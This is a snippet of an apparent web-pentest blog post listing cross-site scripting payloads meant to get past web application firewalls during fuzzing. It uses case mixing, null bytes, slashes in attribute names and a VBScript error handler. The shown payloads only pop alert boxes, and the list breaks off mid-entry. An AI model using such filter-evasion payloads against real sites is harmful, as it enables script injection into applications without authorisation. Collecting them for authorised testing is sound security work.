Tagged: web pentest

Cross site scripting payload for fuzzing

Collected some of the more useful XSS payload, used to bypass the waf and some applications: <sCrIpt>alert(1)</ScRipt> \<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)> <img src=’1′ onerror\x00=alert(0) /> <img src=’1′ onerror/=alert(0) /> <img...